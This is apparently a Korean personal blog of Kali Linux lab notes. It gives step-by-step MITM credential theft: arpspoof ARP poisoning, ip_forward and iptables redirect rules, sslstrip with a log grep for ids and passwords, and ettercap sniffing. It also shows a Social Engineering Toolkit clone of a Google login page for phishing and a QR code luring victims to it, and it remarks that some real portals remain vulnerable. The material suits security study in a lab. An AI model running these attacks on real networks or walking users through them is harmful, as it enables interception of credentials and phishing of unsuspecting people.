임시

이번에는 sslstrip을 이용하여 id, pw를 가로채는 것을 해보겠다.

SSLStrip 공격이란?

- HTTPS 통신 과정에서 https -> http 로 변경하여 암호화 통신을 방해함

- 동일한 NW환경 혹은 피해자의 트래픽을 수집할 수 있는 환경이어야 함

1) arp spoofing : 사용자의 패킷 -> 공격자

2) 사용자의 패킷이 라우팅이 되도록 ip_forward

3) sslstrip 공격 수행

(http://www.iblue.kr/xe/index.php?document_srl=116044&mid=board_OSMt72 발췌)

1. ip_forward가 가능하도록 설정

#echo 1 > /proc/sys/net/ipv4/ip_forward

2. arpspoofing 작동

#arpspoof -t victim-ip gw-ip

3. iptables rule 설정

#iptables --flush

#iptables -t nat -A PREROUTING -p tcp

   --destination-port 80 -j REDIRECT

   --to-ports 8080                               //위에는 port 밑에는 ports 주의

sslstrip 작동시키기

이번에도 역시 사이트는 공개하지 않기로 한다.

희생자가 해당 사이트에 접속하여 id와 pw를 입력할 경우

아래의 화면을 확인할 수 있다.

#cat sslstrip.log | grep -a id값(또는 pass)

다음으로는 ettercap을 이용한 HTTPS 도청 방법이다.

1. /etc/ettercap/etter.conf 수정        (http://kkn1220.tistory.com/32 참고)

2. enable ip_forward

#echo 1 > /proc/sys/net/ipv4/ip_forward

3. arpspoof 실행

#arpsppof -t victim_ip gw_ip

4. iptables_rules 설정

#iptables --flush

#iptables -t nat -A PREROUTING -p tcp

  --destination-port 80 -j REDIRECT

  --to-ports 10000

5. sslstrip 실행

#sslstrip -a -k -f

6. ettercap 가동

#ettercap -T -q -i eth0

7. 희생자는 사이트 접속 후 id, pw 입력

역시 이 또한 가능하다는 것을 확인해 볼 수 있다.

네이x, goox, 다x 등 대형 포털사이트는 막힘

2016-02-03

ettercap에 대한 소개(http://kkn1220.tistory.com/63 참고)

전체 순서

1. edit etter.conf

     - id filed, redirect field

2. fire up ettercap

3. select a netmask

4. sniff --> Unified sniffing --> interface

5. Hosts --> Scan for hosts

6. Select Target1 = Victim target2 = default gw

7. MITM --> ARP poisoning

8. start sniffing

9. check if the poison was successful

etter.conf 수정

uid와 gid 0으로 수정

위의 라인들 중 171 line과 172 line 이 우리 실습에 해당. 167, 168 은 이전 버전의 방화벽 설정이다.

해당 라인 주석을 삭제!

wq! 저장하고 나온다.

ettercap -G  //G는 그래픽 모드

sniff -> unified -> ok

host tab -> scan for hosts

host list를 누르면 리스트를 확인할 수 있다.

여기에서 Target1은 희생자, Target2는 Gateway가 된다. 
즉 130 희생자는 target1이되어, 128인 kali의 MAC 주소는 2번의 MAC주소와 같게 보인다.

그 다음 Man in the middle 어태크

희생자 cmd에서 arp-a치면

위의 화면처럼 나오는데 128 칼리와 gateway mac이 같다는 것을 확인할 수 있다.

보안이 해결되었는지 모르겠지만 혹시 모르기 때문에 사이트는 공개 안함

아무쪼록 id와 pw를 입력했을 때 ettercap에서 user와 password를 가로챌 수 있음

최근 위의 방법은 많은 사이트가 보완하였음. 그러나 아직 나이x 이런데는 보완안함
(옥x, gmax 등. 인증강화 차원에서 보완한듯함. 그러나 http://kkn1220.tistory.com/33 의 방식으로 sslstrip은 여전히 취약)
2016-02-03

Social Engineering toolkit(set)

기본적으로 Kali나 Backtrack 의 경우 setoolkit 이 자동으로 설치되어 있다.

update하기 귀찮아서 no로 했음..

소셜 엔지니어링 어태크 선택

종류가 다양하다. 웹사이트 공격, SMS 스푸핑, 무선공유기 공격 등 다양한데 웹 사이트 공격을 해보도록 하겠다.

역시 다양하다. 시간적 여유가 있다면 이것저것 해보는 것도 유익한 시간일 것 같다.

1) 웹 템플릿은 웹페이지에 트스트용 템플릿을 만들어 준다.

2) site cloner는 network 날라가고 domain page를 똑같이 가지고 온다.

3) custom import는 똑같이 만들어 주는데 구분하기가 상당히 힘들다)

site clone을 해보기로 했다.

아파치가 실행되지 않아 실행시켜줘야됨......

아파치 실행 후 다시 시작

컨씨컨브이

컨씨컨브이

사이트 클론

주소를 보면 현재 내 ip(kali 즉 공격자 ip) 주소로 구글 로그인과 똑같은 것을 확인할 수 있다.

여기에서 email을 sample, 비밀번호를 1234로 했다.

kali에서 /var/www에서 cat한 결과 다음과 같다.

ㅎㄷㄷ...

바로 끝내기 아쉬우니 QR공격을 해보자.

진짜 간단하다. 공격자의 ip를 넣어주고 qr을 생성하면

QR이미지가 생성된다.

ㅎㄷㄷ...

저 QR을 찍으면 공격자의 사이트로 이동된다.

실제로 저렇게 만들고 이벤트 회사인것마냥 사이트를 구성해준다면

많이 당할듯 싶은데

테스트는 테스트일뿐이지 실제 악용하면 안된다.

실습환경

- 가상머신(vmware 11)

- 버전: 1.09 (마지막 버전 1.1.0(2015.2.09 출시)

- 칼리 리눅스는 정보보안을 테스트하기 위한 오픈 소스 리눅스 배포판인 백트랙의 후속 버전

vmware에서 file-newvirtual machine 클릭

custom으로 설치해보았다.

지원하는 OS가 많은데 뭐 굳이 아무거나해도..

가상이라서 마음대로 할 수 있는 건 아니다.

cpu(processor)는 코어할당, CPU 할당, hyper threding 3가지 방법으로 할당할 수 있다.  자신이 가지고 있는 cpu 환경에 맞게 설정해야된다. (cpu,개수  코어 개수)

메모리는 알아서 설정하면 되는데 kali의 경우 좀 필요하다고 판단하여 4GB정도 넣어줌

계속 Next하면 최종적으로 생성이됨.

 (뭐 여기까지는 kali 이미지파일 구해서 적당히 넣어주면 되기 때문에 간단하게 진행함)

실행하면 위의 화면처럼 나오는데 그냥 기능만 확인해보고 싶으면 live로 확인하고

뭐 좀 제대로 해보려면 Install 하면 됨

심플함....

이것 저것 많은 기능을 제공함

이제 이 기능을 가지고 재미있는 몇 가지를 해보겠다^^